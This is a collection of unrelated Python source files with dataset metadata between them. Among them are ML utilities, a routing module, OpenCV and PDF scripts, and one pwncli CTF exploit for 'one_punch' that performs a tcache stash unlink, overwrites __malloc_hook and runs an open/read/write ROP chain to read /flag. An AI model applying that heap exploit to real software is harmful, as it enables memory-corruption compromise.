int(np.ceil(float(array.shape[0]) / n_cols)) def cell(i, j): ind = i * n_cols + j return array[ind] if ind < array.shape[0] else np.zeros(array[0].shape) def row(i): return np.concatenate([cell(i, j) for j in range(n_cols)], axis=1) return np.concatenate([row(i) for i in range(n_rows)], axis=0) def set_global_seeds(i): try: import tensorflow as tf except ImportError: pass else: #from mpi4py import MPI tf.set_random_seed(i) np.random.seed(i) random.seed(i) #def explained_variance_non_mpi(ypred,y): # """ # Computes fraction of variance that ypred explains about y. # Returns 1 - Var[y-ypred] / Var[y] # # interpretation: # ev=0 => might as well have predicted zero # ev=1 => perfect prediction # ev<0 => worse than just predicting zero # # """ # assert y.ndim == 1 and ypred.ndim == 1 # vary = np.var(y) # return np.nan if vary==0 else 1 - np.var(y-ypred)/vary # #def mpi_var(x): # return mpi_moments(x)[1]**2 # #def explained_variance(ypred,y): # """ # Computes fraction of variance that ypred explains about y. # Returns 1 - Var[y-ypred] / Var[y] # # interpretation: # ev=0 => might as well have predicted zero # ev=1 => perfect prediction # ev<0 => worse than just predicting zero # # """ # assert y.ndim == 1 and ypred.ndim == 1 # vary = mpi_var(y) # return np.nan if vary==0 else 1 - mpi_var(y-ypred)/vary def add_noise(img, noise_p, noise_type): noise_mask = np.random.binomial(1, noise_p, size=img.shape[0]).astype(np.bool) w = 12 n = 84//12 idx_list = np.arange(n*n) random.shuffle(idx_list) idx_list = idx_list[:np.random.randint(10, 40)] for i in range(img.shape[0]): if not noise_mask[i]: continue for idx in idx_list: y = (idx // n)*w x = (idx % n)*w img[i, y:y+w, x:x+w, -1] += np.random.normal(0, 255*0.3, size=(w,w)).astype(np.uint8) img = np.clip(img, 0., 255.) return img g_font = [None] def draw_text_to_image(text, height=None, width=None, channels=None): from PIL import Image, ImageDraw, ImageFont if g_font[0] is None: g_font[0] = ImageFont.load_default() font = g_font[0] # ImageFont.ImageFont.getsize doesn't work for multi-line strings. # https://github.com/python-pillow/Pillow/issues/2966 #text_size = font.getsize(text) dummy_img = Image.fromarray(np.zeros((1, 1), dtype=np.uint8)) dummy_draw = ImageDraw.Draw(dummy_img) text_size = dummy_draw.textsize(text, font=font) if channels is None: shape = (height or text_size[1], width or text_size[0]) else: shape = (height or text_size[1], width or text_size[0], channels) i = np.zeros(shape, dtype=np.uint8) img = Image.fromarray(i) draw = ImageDraw.Draw(img) draw.text((3, 0), text, font=font, fill=(255,)*channels) return np.asarray(img) def get_percentile_indices(data, percentiles=np.arange(0.0, 1.05, 0.1)): assert len(data.shape) == 1 data_asc = np.argsort(data) percentile_indices = (percentiles * (len(data_asc) - 1)).astype(int) percentile_indices = data_asc[percentile_indices] #assert np.all(data[percentile_indices[:-1]] <= data[percentile_indices[1:]]) return percentile_indices class CContext(): def __init__(self, verbose=False, print_func=print): self._state_funcs = OrderedDict() self._evaluated_states = OrderedDict() self._dependencies = defaultdict(set) self._eval_context = [] self._verbose = verbose self._print_func = print_func def register_state(self, name, create): if name in self._state_funcs: raise Exception('State already registered: {}'.format(name)) self._state_funcs[name] = create def invalidate_state(self, name): if name not in self._evaluated_states: return del self._evaluated_states[name] if self._verbose: self._print_func('Invalidated state "{}"'.format(name)) for n in self._dependencies[name]: self.invalidate_state(n) del self._dependencies[name] def __getattr__(self, attr): if attr not in self._state_funcs: raise Exception('Unknown state {}'.format(attr)) if attr in self._eval_context: raise Exception('Circular dependency detected: {}, {}'.format(attr, self._eval_context)) self._dependencies[attr] = self._dependencies[attr].union(set(self._eval_context)) if attr not in self._evaluated_states: self._eval_context.append(attr) evaluated_state = self._state_funcs[attr](self) if self._verbose: self._print_func('Evaluated state "{}"'.format(attr)) self._eval_context.pop() self._evaluated_states[attr] = evaluated_state return self._evaluated_states[attr] class EmptyClass(): pass # From https://github.com/openai/large-scale-curiosity/blob/0c3d179fd61ee46233199d0891c40fbe7964d3aa/cppo_agent.py#L226-L236 class RewardForwardFilter(object): def __init__(self, gamma): self.rewems = None self.gamma = gamma def update(self, rews): if self.rewems is None: self.rewems = rews else: self.rewems = self.rewems * self.gamma + rews return self.rewems class RunningMeanStd(object): # https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm def __init__(self, epsilon=1e-4, shape=()): self.mean = np.zeros(shape, 'float64') self.var = np.ones(shape, 'float64') self.count = epsilon def update(self, x): batch_mean = np.mean(x, axis=0) batch_var = np.var(x, axis=0) batch_count = x.shape[0] self.update_from_moments(batch_mean, batch_var, batch_count) def update_from_moments(self, batch_mean, batch_var, batch_count): self.mean, self.var, self.count = update_mean_var_count_from_moments( self.mean, self.var, self.count, batch_mean, batch_var, batch_count) class SimpleWeightedMovingScalarMeanStd(): def __init__(self, alpha=0.0001): self._alpha = alpha self.mean = 0.0 self.var = 1.0 def update(self, values): self.mean = (1 - self._alpha) * self.mean + self._alpha * np.mean(values) self.var = (1 - self._alpha) * self.var + self._alpha * np.mean(np.square(values - self.mean)) def update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count): delta = batch_mean - mean tot_count = count + batch_count new_mean = mean + delta * batch_count / tot_count m_a = var * count m_b = batch_var * batch_count M2 = m_a + m_b + np.square(delta) * count * batch_count / tot_count new_var = M2 / tot_count new_count = tot_count return new_mean, new_var, new_count
36.789831
155
0.609417
1,501
10,853
4.223185
0.207195
0.017353
0.017984
0.014198
0.265184
0.189778
0.13693
0.118946
0.097492
0.097492
0
0.024378
0.262969
10,853
294
156
36.914966
0.768096
0.400719
0
0.04698
0
0
0.032415
0
0
0
0
0
0.020134
1
0.127517
false
0.013423
0.053691
0.006711
0.281879
0.033557
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbe72b5112056466b1083e545acb1c1e6dff2bb
901
py
Python
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
class Location: def __init__(self, x : int, y : int): self.x = x self.y = y def getX(self) -> int: return self.x def getY(self) -> int: return self.y def __eq__(self, value): return self.x == value.x and self.y == value.y def __hash__(self): return hash("%d %d" % (self.x, self.y)) class Placement: def __init__(self,code: int, pawnType: int, location: Location): self.code = code self.pawnType = pawnType self.location = location def getLocation(self) -> Location: return self.location def getPawnType(self) -> int: return self.pawnType def getPawnSymbol(self) -> str: if self.pawnType == 0: return "X" elif self.pawnType == 1: return "O" return "N" def getRoomCode(self) -> int: return self.code
22.525
68
0.54717
113
901
4.221239
0.265487
0.125786
0.109015
0.142558
0
0
0
0
0
0
0
0.00335
0.337403
901
39
69
23.102564
0.795645
0
0
0
0
0
0.008889
0
0
0
0
0
0
1
0.344828
false
0
0
0.241379
0.758621
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
bdbebeb76abb18683215eb78cded4e0d06667190
191
py
Python
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
146
2018-09-19T11:38:48.000Z
2022-03-21T11:54:12.000Z
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
783
2018-09-28T17:07:14.000Z
2022-03-31T10:18:27.000Z
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
147
2018-09-25T18:39:51.000Z
2022-03-01T19:31:27.000Z
from adapters.lumi.aqara_opple_switch import AqaraOppleSwitch class WXCJKG13LM(AqaraOppleSwitch): def __init__(self): buttons_count = 6 super().__init__(buttons_count)
21.222222
61
0.743455
21
191
6.190476
0.809524
0.184615
0
0
0
0
0
0
0
0
0
0.019231
0.183246
191
8
62
23.875
0.814103
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.6
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
bdc046b158b884fea2bcbaf2bb1204d34d3b4b00
4,565
py
Python
pydtnsim/routing/cgr_utils.py
ducktec/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
8
2018-12-11T17:39:44.000Z
2021-05-07T10:24:03.000Z
pydtnsim/routing/cgr_utils.py
Elianelin/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
13
2019-01-14T14:08:15.000Z
2021-06-12T17:03:43.000Z
pydtnsim/routing/cgr_utils.py
Elianelin/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
4
2019-03-20T15:12:40.000Z
2022-02-22T06:16:24.000Z
"""Module of commonly shared functions of various flavours of CGR.""" import math def cgr_neighbor_function(contact_graph, node, destination, current_distance, set_visited, suppressed_contacts, lookahead_time): """Neighbor function of CGR used by the Dijkstra algorithm. Used to determine feasible direct neigbors of a given node. Args: contact_graph (ContactGraph): The topology information in the form of a contact graph node (tuple): The evaluated node in the contact graph node form ``(from_node, to_node, from_time, to_time, data_rate)``. destination (tuple): The nominal destination node in the form ``(destination_id, destination_id, 0, math.inf, math.inf)`` current_distance (int): Contains the weight of the shortest path to the currently investigated node (in ms). set_visited (set): Set used for storing the visited flag of nodes during the Dijkstra runs. Also used for excluding suppressed (physical) nodes. suppressed_contacts (list): List of contacts that shall not be considered for forwarding (and thus neighbor selection) lookahead_time (int): Time value that specifies a time window (or rather a maximum time) only in which routes are searched. This reduces the time necessary to find a shortest route. Returns: list: A list of all feasible neighbors with items of the form ``(<node_id>, weight)`` with ``<node_id>`` representing a certain contact in the contact graph. """ neighbors = [] # Set the node as visited set_visited.add(node.from_node) # Extract the start time of the given node for edge in contact_graph.graph[node].successors: # Break the loop if the found edge to_time is smaller than the # current distance. As the successor list is sorted, all subsequent # edges will be smaller as well. if edge.to_time <= current_distance: break # Only consider when neigbor has not been visited by dijkstra yet # and it is not in the suppressed_contacts list # and can be reached given the currently consideret point in time # and if it is within the lookahead window (only when a lookahead # window is used) if ((lookahead_time is None or edge.from_time < lookahead_time) and edge.to_node not in set_visited and edge not in suppressed_contacts and (edge.to_time > current_distance)): # Only add to neighbors if no artificial end node or artificial end # node is bundle's destination if edge == destination or edge.from_node != edge.to_node: # Calculate the time (which is either positive or 0, relevant # for artificial terminal nodes) weight = edge.from_time - current_distance weight = max(weight, 0) # Append to neighbor list with weight neighbors.append((edge, weight)) return neighbors def cgr_get_route_characteristics(route, distance): """Calculate characteristics of a certain route. Args: route (list): A list of the nodes of the calculated route that's elements comprise of all relevant information for determining the characteristics' distance (int): The precalculated distance Returns: tuple: A tuple consisting of the (precalculated) distance, the capacity and the end time of the availability of that route """ capacity = math.inf distance = 0 # Iterate over all nodes in route and check if capacity is smaller than # already found minimum for node in route: distance = max(distance, node.from_time) # Generate capacity for node's contact capacity_new = ((node.to_time - distance) * node.datarate) # Update capacity if smaller if capacity_new < capacity: capacity = capacity_new # The to_time of a route is the minimum end time of a contact within this # route (minus the assumed signal propagation delay, in the rr considered # to be neglegible) to_time = min([node.to_time for node in route]) # Return the characteristics tuple consisting of the route distance (i.e. # the arrival time), the route capacity and the route availability end # time (i.e. the to-time) return (distance, capacity, to_time)
42.268519
79
0.660241
611
4,565
4.847791
0.289689
0.020257
0.016205
0.011479
0.01688
0
0
0
0
0
0
0.001225
0.284556
4,565
107
80
42.663551
0.905695
0.645126
0
0
0
0
0
0
0
0
0
0
0
1
0.074074
false
0
0.037037
0
0.185185
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc04f43fced1ed2108de24776b9c054870c3a6d
785
py
Python
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
24
2018-11-22T21:04:49.000Z
2021-11-08T11:18:09.000Z
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
1
2019-02-06T15:58:46.000Z
2019-02-12T20:31:50.000Z
rxbp/multicast/multicastobservers/mapmulticastobserver.py
MichaelSchneeberger/rx_backpressure
16173827498bf1bbee3344933cb9efbfd19699f5
[ "Apache-2.0" ]
1
2021-01-26T12:41:37.000Z
2021-01-26T12:41:37.000Z
from dataclasses import dataclass from typing import Callable from rxbp.multicast.multicastobserver import MultiCastObserver from rxbp.multicast.typing import MultiCastItem @dataclass class MapMultiCastObserver(MultiCastObserver): source: MultiCastObserver func: Callable[[MultiCastItem], MultiCastItem] def on_next(self, item: MultiCastItem) -> None: try: def map_gen(): for v in item: yield self.func(v) next = map_gen() except Exception as exc: self.source.on_error(exc) else: self.source.on_next(next) def on_error(self, exc: Exception) -> None: self.source.on_error(exc) def on_completed(self) -> None: self.source.on_completed()
27.068966
62
0.650955
88
785
5.704545
0.386364
0.079681
0.095618
0.067729
0.079681
0
0
0
0
0
0
0
0.26879
785
29
63
27.068966
0.874564
0
0
0.090909
0
0
0
0
0
0
0
0
0
1
0.181818
false
0
0.181818
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc1c2924b490c44031d1301da774e5f85923904
112
py
Python
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
1
2021-04-08T14:02:49.000Z
2021-04-08T14:02:49.000Z
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
null
null
null
Unit 5/5.2/5.2.8 Average Test Score.py
shashwat73/cse
60e49307e57105cf9916c7329f53f891c5e81fdb
[ "MIT" ]
null
null
null
Score = 0 for For3Scores in range(1,4): Average = int(input()) Score += Average print((Score/3))
12.444444
30
0.589286
16
112
4.125
0.8125
0
0
0
0
0
0
0
0
0
0
0.060241
0.258929
112
8
31
14
0.73494
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdc3d024640dd15b38deac97c8ed950cc5cf3909
415
py
Python
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
main/rsa_encryption/settings.py
Risoko/RSA-Encryption
1bea1ef3a7609541578d784b7315c73e1e6a481b
[ "MIT" ]
null
null
null
from decouple import config RANGE_OF_PRIME_NUMBERS = { "min": 10, "max": 190 } DATABASE = { 'type': config("TYPE"), 'user': config("USER"), 'password': config("PASSWORD"), 'localhost': config("LOCALHOST"), 'database_name': config("DATABASE_NAME") } PATH_FOR_PUBLIC_KEY = "/home/risoko/Pulpit/public_key" KEYS_EXPIRE = { "DAYS": 0, "MINUTES": 10, "SECONDS": 0 }
18.863636
54
0.6
47
415
5.085106
0.659574
0.100418
0
0
0
0
0
0
0
0
0
0.02795
0.224096
415
22
55
18.863636
0.714286
0
0
0
0
0
0.3125
0.072115
0
0
0
0
0
1
0
false
0.055556
0.055556
0
0.055556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
bdc402ae42475915911f7485b03af5085a350424
2,413
py
Python
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
clean-up-pdf.py
spider-walker/reading-pdf-files-mongo
3a7b5346bd8e5bedfba388ea9a0053cd8330d332
[ "Apache-2.0" ]
null
null
null
with open('./data/data2017.txt') as f: lines = f.readlines() for ln in lines: ln = ln.replace(',', '').replace(':', '').replace('int64', '') \ .replace('Name', '').replace('dtype', '').replace('/', ' ') \ .replace('object', '').replace('float64', ' ') \ .replace('NaN', '').replace('NaN', ' ') \ .replace('.', ' ') text = ln.split() if text[0].isnumeric(): text.pop(0) if text[0].isnumeric(): text.pop(0) if text[0].isnumeric(): text.pop(0) if not text[1].isnumeric(): text[0] = f'{text[0]} {text[1]}' text.pop(1) if not text[2].isnumeric(): text.insert(2, '0') text.insert(3, '0') if not text[1].isnumeric(): text[0] = f'{text[0]} {text[1]}' text.pop(1) if len(text) > 6 and not text[5].isnumeric(): text[4] = f'{text[4]} {text[5]}' text.pop(5) if len(text) > 6 and not text[5].isnumeric(): text[4] = f'{text[4]} {text[5]}' text.pop(5) if len(text) > 7 and not text[6].isnumeric(): text.insert(6, '0') text.insert(7, '0') if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 9 and not text[9].isnumeric(): text[8] = f'{text[8]} {text[9]}' text.pop(9) if len(text) > 7 and not text[7].isnumeric(): text.insert(7, '0') text.insert(9, '0') if len(text) == 10: text.insert(9, '0') if len(text) == 10: text.insert(9, '0') if len(text) == 11 and text[9].isnumeric() and int(text[9].strip())>100: text.insert(9, '0') if len(text) == 7: text.insert(1, '0') text.insert(3, '0') text.insert(6, '0') text.insert(7, '0') text.insert(9, '0') notwanted = ['-------------------------------', 'CONSTITUENCY_NAME', 'GRAND TOTAL', 'CAW'] if not set(text) & set(notwanted): text.insert(0, f'{len(text)}') s = ','.join(text) print(f' {s}')
30.544304
98
0.426855
312
2,413
3.298077
0.166667
0.145773
0.09621
0.048591
0.637512
0.613217
0.613217
0.571429
0.501458
0.501458
0
0.064267
0.35516
2,413
78
99
30.935897
0.597044
0
0
0.66129
0
0
0.11811
0.012847
0
0
0
0
0
1
0
false
0
0
0
0
0.016129
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc63bfed4044eff802e2301570d6c7de4fbc7e5
1,423
py
Python
cv_workshops/7-day/9-clazz.py
afterloe/opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
5
2020-03-13T07:34:30.000Z
2021-10-01T03:03:05.000Z
cv_workshops/7-day/9-clazz.py
afterloe/Opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
null
null
null
cv_workshops/7-day/9-clazz.py
afterloe/Opencv-practice
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
[ "MIT" ]
1
2020-03-01T12:35:02.000Z
2020-03-01T12:35:02.000Z
#!/usr/bin/env python3 # -*- coding=utf-8 -*- import cv2 as cv """ 形态学分析应用 - 使用基本梯度对轮廓进行分析处理 使用形态学的二值化处理,对是别内容进行轮廓分析,在OCR上是其处理的手段之一,相比于threshold的二值化而言,对图像会有更好的分割效 果,技术路线如下: 1 图像形态学梯度 2 灰度 3 全局阈值二值化 4 轮廓分析 """ def main(): src = cv.imread("../../pic/1.jpg") blur = cv.medianBlur(src, 3) kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3)) gradient = cv.morphologyEx(blur, cv.MORPH_GRADIENT, kernel) cv.imshow("gradient", gradient) gray = cv.cvtColor(gradient, cv.COLOR_BGR2GRAY) _, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU) cv.imshow("binary", binary) # binary = cv.morphologyEx(binary, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_CROSS, (3, 3))) # 膨胀 3*3 十字交叉 contours, _ = cv.findContours(binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE) if 0 == len(contours): print("未搜寻到结果") return for index in range(len(contours)): contour = contours[index] x, y, w, h = cv.boundingRect(contour) # 获取最大外接矩形 area = cv.contourArea(contour) # 获取轮廓面积 if not 10 < area < 500 or not 10 < h < 60: continue cv.rectangle(src, (x, y), (x + w, y + h), (0, 0, 255), 2, cv.LINE_8) cv.imshow("src", src) cv.waitKey(0) cv.destroyAllWindows() if "__main__" == __name__: main()
31.622222
121
0.598032
182
1,423
4.56044
0.516484
0.048193
0.060241
0.072289
0
0
0
0
0
0
0
0.036294
0.264231
1,423
44
122
32.340909
0.756447
0.120871
0
0
0
0
0.045635
0
0
0
0
0
0
1
0.038462
false
0
0.038462
0
0.115385
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc6adac6ca6afd61c4934fbf7cff6d47b19bb9a
1,118
py
Python
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
vaccibot/__main__.py
fsoubelet/vaccibot
f0956ddbf9f0ac712d3e6e10d9fb5f3edb3dda11
[ "MIT" ]
null
null
null
import sys from loguru import logger from rich.console import Console, RenderGroup from rich.panel import Panel from vaccibot.constants import LOGURU_FORMAT from vaccibot.parsing import ARGS from vaccibot.process import retrieve_all_suitable_appointments from vaccibot.render import make_department_table logger.remove() logger.add(sys.stdout, level=f"{ARGS.logs.upper()}", format=LOGURU_FORMAT) @logger.catch() def main() -> None: """Parses arguments from the commandline, fetches data and renders it in the terminal.""" console = Console() panels = [] suitable_appointments: dict = retrieve_all_suitable_appointments() for department, appointments in suitable_appointments.items(): if appointments: # do not make a panel and table if no appointments found panels.append( Panel( make_department_table(appointments), title=department, expand=True, border_style="scope.border", ) ) console.print(*panels) if __name__ == "__main__": main()
30.216216
93
0.674419
127
1,118
5.755906
0.503937
0.065663
0.051984
0.084815
0
0
0
0
0
0
0
0
0.246869
1,118
36
94
31.055556
0.868171
0.124329
0
0
0
0
0.040082
0
0
0
0
0
0
1
0.035714
false
0
0.285714
0
0.321429
0.035714
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdc6c6cba8f42afd0b986c47d1d40853cdff8c8c
4,618
py
Python
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
buuctf/107-hitcon_ctf_2019_one_punch/exp.py
RoderickChan/ctf_tasks
a021c6d86cade26448d099933f3caa856ed28360
[ "MIT" ]
null
null
null
from pwncli import * cli_script() p:tube = gift['io'] elf:ELF = gift['elf'] libc: ELF = gift['libc'] pop_rdi_ret = 0x26542 pop_rsi_ret = 0x26f9e pop_rdx_ret = 0x12bda6 pop_rax_ret = 0x47cf8 syscall_ret = 0xcf6c5 def debut(idx, size, name="a"): if isinstance(name, str): pad = "a" else: pad = b"a" name = name.ljust(size, pad) p.sendlineafter("> ", "1") p.sendlineafter("idx: ", str(idx)) p.sendafter("hero name: ", name) def rename(idx, name): p.sendlineafter("> ", "2") p.sendlineafter("idx: ", str(idx)) p.sendafter("hero name: ", name) def show(idx): p.sendlineafter("> ", "3") p.sendlineafter("idx: ", str(idx)) p.recvuntil("hero name: ") return u64(p.recvline()[:-1].ljust(8, b"\x00")) def retire(idx): p.sendlineafter("> ", "4") p.sendlineafter("idx: ", str(idx)) def punch(data): p.sendlineafter("> ", "50056") p.send(data) p.recvuntil("Serious Punch!!!\n") # use tcachebin stach unlink, while has 5, to malloc at any address def attack1(): debut(0, 0x400) retire(0) debut(1, 0x400) retire(1) heap_base_addr = show(1) - 0x260 log_address("heap_base_addr", heap_base_addr) for i in range(5): debut(0, 0x400) retire(0) debut(0, 0x400) for i in range(5): debut(1, 0x210) retire(1) retire(0) libc_base_addr = show(0) - 0x1e4ca0 libc.address = libc_base_addr log_address("libc_base_addr", libc_base_addr) # split chunk debut(1, 0x1e0) # get smallbin chunk debut(1, 0x400) payload = flat({ 0: [0, 0x221, heap_base_addr + 0x20b0, libc_base_addr + 0x1e4bf8], 0x1e0: [0, 0x221, 0xdeadbeef, heap_base_addr + 0x1ed0] }, filler="\x00") rename(0, payload) # to trigger tcache stash unlink debut(1, 0x210) # to change __malloc_hook payload = flat({ 0x20: "/flag\x00\x00\x00", 0x28: libc_base_addr + 0x99540 }) punch(payload) layout = [ libc_base_addr + pop_rdi_ret, # rdi libc.sym["__malloc_hook"] - 8, libc_base_addr + pop_rsi_ret, # rsi 0, libc_base_addr + pop_rax_ret, # rax 2, # open("/flag", 0) libc_base_addr + syscall_ret, # syscall libc_base_addr + pop_rdi_ret, 3, libc_base_addr + pop_rsi_ret, heap_base_addr + 0x400, libc_base_addr + pop_rdx_ret, 0x30, libc_base_addr + pop_rax_ret, 0, # read libc_base_addr + syscall_ret, libc_base_addr + pop_rdi_ret, 1, libc_base_addr + pop_rax_ret, 1, libc_base_addr + syscall_ret ] debut(1, 0x300, flat(layout)) p.interactive() # use tcachebin stach unlink, while has 6, to write heap address at any address def attack2(): debut(0, 0x400) retire(0) debut(1, 0x400) retire(1) heap_base_addr = show(1) - 0x260 log_address("heap_base_addr", heap_base_addr) for i in range(5): debut(0, 0x400) retire(0) debut(0, 0x400) for i in range(6): debut(1, 0x2f0) retire(1) debut(2, 0x210) retire(2) # stop() retire(0) libc_base_addr = show(0) - 0x1e4ca0 libc.address = libc_base_addr log_address("libc_base_addr", libc_base_addr) # split chunk debut(1, 0x100) # get smallbin chunk debut(1, 0x400) payload = flat({ 0: [0, 0x301, heap_base_addr + 0x1fd0, heap_base_addr + 0x20 - 5], 0x100: [0, 0x301, 0xdeadbeef, heap_base_addr + 0x1ed0] }, filler="\x00") rename(0, payload) # to trigger tcache stash unlink debut(1, 0x2f0) stop() rename(2, p64(libc.sym['__malloc_hook']-8)) punch("a" * 0x60) punch(b"/flag\x00\x00\x00" + p64(libc_base_addr + 0x8cfd6)) # add rsp 0x48; ret layout = [ libc_base_addr + pop_rdi_ret, # rdi libc.sym["__malloc_hook"] - 8, libc_base_addr + pop_rsi_ret, # rsi 0, libc_base_addr + pop_rax_ret, # rax 2, # open("/flag", 0) libc_base_addr + syscall_ret, # syscall libc_base_addr + pop_rdi_ret, 3, libc_base_addr + pop_rsi_ret, heap_base_addr + 0x400, libc_base_addr + pop_rdx_ret, 0x30, libc_base_addr + pop_rax_ret, 0, # read libc_base_addr + syscall_ret, libc_base_addr + pop_rdi_ret, 1, libc_base_addr + pop_rax_ret, 1, libc_base_addr + syscall_ret ] debut(1, 0x300, flat(layout)) p.interactive() attack2()
22.637255
83
0.586618
647
4,618
3.933539
0.196291
0.150884
0.165029
0.10609
0.671513
0.655403
0.619253
0.619253
0.619253
0.619253
0
0.089829
0.28887
4,618
204
84
22.637255
0.68514
0.086618
0
0.657718
0
0
0.058164
0
0
0
0.068415
0
0
1
0.04698
false
0
0.006711
0
0.060403
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bdc856fc9ff913efd9003763250b43ae605b0ec6
1,277
py
Python
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
1
2019-05-16T02:52:12.000Z
2019-05-16T02:52:12.000Z
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
null
null
null
pi4home/components/text_sensor/custom.py
khzd/pi4home
937bcdcf77bab111cca10af1fe45c63a55c29aae
[ "MIT" ]
null
null
null
